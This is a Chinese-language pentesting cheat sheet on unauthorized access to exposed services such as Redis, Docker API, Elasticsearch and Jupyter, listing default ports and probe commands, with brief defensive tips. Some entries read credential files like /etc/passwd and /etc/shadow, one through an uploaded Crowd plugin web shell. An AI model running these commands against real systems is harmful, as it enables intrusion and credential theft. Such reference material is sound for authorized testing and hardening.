端口未授权总结(外部打点)
字数 1638 2025-08-19 12:42:30

端口未授权访问漏洞全面总结与利用指南

一、概述

端口未授权访问是网络安全中常见的高危漏洞,攻击者无需认证即可直接访问服务接口或管理界面,可能导致信息泄露、权限提升甚至远程代码执行。本文全面总结了27种常见服务的未授权访问漏洞及其利用方法。

二、常见未授权访问漏洞详解

1. Memcached 未授权访问

  • 默认端口: 11211
  • 验证方法:
    telnet 10.10.4.89 11211
    nc -vv 10.10.4.89 11211
    
  • 利用命令: stats 查看服务信息

2. ZooKeeper 未授权访问

  • 默认端口: 2181, 2182
  • 验证方法:
    ./zkCli.sh -timeout 0 -r -server 10.10.4.72:2181
    
    Windows: zkCli.cmd -timeout 0 -r -server 10.10.4.72:2181

3. Elasticsearch 未授权访问

  • 默认端口: 9100, 9200, 9300
  • 验证方法:
    curl http://10.2.20.48:9200/
    curl http://10.2.20.48:9200/_cat
    curl http://10.2.20.48:9200/_cat/_river/_search
    curl http://10.2.20.48:9200/cat/indices
    curl http://10.2.20.48:9100/metrics
    

4. Kibana 未授权访问

  • 默认端口: 5601
  • 验证方法: 直接访问
    https://10.10.4.89:5601/
    https://10.10.4.89/app/kibana
    

5. Docker Remote API 未授权访问

  • 默认端口: 2375
  • 验证方法:
    http://10.10.4.89:2375/
    http://10.10.4.89:2375/version
    docker -H tcp://10.10.4.89:2375 version
    docker -H tcp://10.10.4.89:2375 images
    

6. Kubernetes Api Server 未授权访问

  • 默认端口: 8080, 6443
  • 验证方法:
    http://10.10.4.89:8080/
    http://10.10.4.89:8080/ui
    http://192.168.56.101:8001/api/v1/namespaces/kube-system/services/https:kubernetes-dashboard:/proxy/#!/login
    

7. Hadoop 未授权访问

  • 默认端口: 8088
  • 验证方法:
    http://192.168.18.129:8088/cluster
    curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' http://ip:8088/ws/v1/cluster/apps --data-binary @1.json
    

8. Jenkins未授权访问

  • 默认端口: 8080
  • 验证方法: http://192.168.18.129:8080/manage

9. ActiveMQ未授权访问

  • 默认端口: 8161
  • 默认凭证: admin/admin

10. RabbitMQ未授权访问

  • 验证URL:
    http://10.10.4.89:15672
    http://10.10.4.89:25672/
    http://10.10.4.89:15692/
    
  • 默认凭证: guest/guest

11. Springboot actuator 未授权访问

  • 特征: 绿叶子图标和报错页面
  • 验证方法:
    http://10.2.20.48:/autoconfig
    

12. FTP未授权访问(匿名登录)

  • 默认端口: 21
  • 验证方法: ftp://ip:port/

13. JBOSS 未授权访问

  • 特征: 8080端口左上角有JBoss logo
  • 验证方法:
    http://ip:jboss端口/jmx-console
    http://ip:jboss端口/web-console
    

14. LDAP未授权访问

  • 验证方法: 使用ldapbrowser直接连接获取目录内容

15. Rsync 未授权访问

  • 默认端口: 873
  • 验证方法:
    rsync rsync://{target_ip}/
    rsync rsync://172.16.2.250:873/src
    rsync rsync://172.16.2.250:873/src/etc/passwd ./
    

16. VNC 未授权访问

  • 默认端口: 5900, 5901
  • 验证方法: vncviewer 192.168.15.8

17. Dubbo 未授权访问

  • 验证方法: telnet IP port

18. NFS 共享目录未授权访问

  • 默认端口: 2049, 20048
  • 验证方法:
    showmount -e 192.168.70.162
    mount -t nfs 192.168.70.162:/grdata /mnt
    

19. Druid 未授权访问

  • 常见路径:
    /druid/websession.html
    /system/druid/websession.html
    /webpage/system/druid/websession.html
    

20. CouchDB 未授权访问

  • 默认端口: 5984
  • 验证方法:
    curl http://192.168.18.129:5984
    curl http://192.168.18.129:5984/_config
    

21. Atlassian Crowd 未授权访问

  • 默认端口: 8095
  • 利用方法:
    curl --form "file_cdl=@applinks-plugin-5.4.12.jar" http://192.168.18.138:8095/crowd/admin/uploadplugin.action -v
    
    访问: http://10.10.20.166:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow

22. Jupyter Notebook 未授权访问

  • 验证方法: 访问 http://192.168.18.129:8888 通过Terminal执行命令

23. Windows IPC共享未授权访问

  • 默认端口: 139

24. RTSP未授权访问

  • 默认端口: 554
  • 特征: 视频流直接暴露

25. Redis未授权访问

  • 默认端口: 6379
  • 验证方法:
    redis-cli -h 10.2.20.73 -p 6379
    10.2.20.73:6379> info
    

26. MongoDB未授权访问

  • 默认端口: 27017
  • 验证方法:
    mongo --host 10.2.20.34 --port 27017
    xxx-test:SECONDARY> show dbs
    

三、防御建议

  1. 修改默认端口
  2. 配置访问控制列表(ACL)
  3. 启用身份验证机制
  4. 限制网络访问(防火墙规则)
  5. 定期更新服务版本
  6. 监控异常访问行为

四、总结

本文详细列出了27种常见服务的未授权访问漏洞及其验证方法,安全人员可利用这些信息进行安全检测,管理员则应针对这些风险点加强防护。记住,发现漏洞后应及时修复,避免被恶意利用。

端口未授权访问漏洞全面总结与利用指南 一、概述 端口未授权访问是网络安全中常见的高危漏洞,攻击者无需认证即可直接访问服务接口或管理界面,可能导致信息泄露、权限提升甚至远程代码执行。本文全面总结了27种常见服务的未授权访问漏洞及其利用方法。 二、常见未授权访问漏洞详解 1. Memcached 未授权访问 默认端口 : 11211 验证方法 : 利用命令 : stats 查看服务信息 2. ZooKeeper 未授权访问 默认端口 : 2181, 2182 验证方法 : Windows: zkCli.cmd -timeout 0 -r -server 10.10.4.72:2181 3. Elasticsearch 未授权访问 默认端口 : 9100, 9200, 9300 验证方法 : 4. Kibana 未授权访问 默认端口 : 5601 验证方法 : 直接访问 5. Docker Remote API 未授权访问 默认端口 : 2375 验证方法 : 6. Kubernetes Api Server 未授权访问 默认端口 : 8080, 6443 验证方法 : 7. Hadoop 未授权访问 默认端口 : 8088 验证方法 : 8. Jenkins未授权访问 默认端口 : 8080 验证方法 : http://192.168.18.129:8080/manage 9. ActiveMQ未授权访问 默认端口 : 8161 默认凭证 : admin/admin 10. RabbitMQ未授权访问 验证URL : 默认凭证 : guest/guest 11. Springboot actuator 未授权访问 特征 : 绿叶子图标和报错页面 验证方法 : 12. FTP未授权访问(匿名登录) 默认端口 : 21 验证方法 : ftp://ip:port/ 13. JBOSS 未授权访问 特征 : 8080端口左上角有JBoss logo 验证方法 : 14. LDAP未授权访问 验证方法 : 使用ldapbrowser直接连接获取目录内容 15. Rsync 未授权访问 默认端口 : 873 验证方法 : 16. VNC 未授权访问 默认端口 : 5900, 5901 验证方法 : vncviewer 192.168.15.8 17. Dubbo 未授权访问 验证方法 : telnet IP port 18. NFS 共享目录未授权访问 默认端口 : 2049, 20048 验证方法 : 19. Druid 未授权访问 常见路径 : 20. CouchDB 未授权访问 默认端口 : 5984 验证方法 : 21. Atlassian Crowd 未授权访问 默认端口 : 8095 利用方法 : 访问: http://10.10.20.166:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow 22. Jupyter Notebook 未授权访问 验证方法 : 访问 http://192.168.18.129:8888 通过Terminal执行命令 23. Windows IPC共享未授权访问 默认端口 : 139 24. RTSP未授权访问 默认端口 : 554 特征 : 视频流直接暴露 25. Redis未授权访问 默认端口 : 6379 验证方法 : 26. MongoDB未授权访问 默认端口 : 27017 验证方法 : 三、防御建议 修改默认端口 配置访问控制列表(ACL) 启用身份验证机制 限制网络访问(防火墙规则) 定期更新服务版本 监控异常访问行为 四、总结 本文详细列出了27种常见服务的未授权访问漏洞及其验证方法,安全人员可利用这些信息进行安全检测,管理员则应针对这些风险点加强防护。记住,发现漏洞后应及时修复,避免被恶意利用。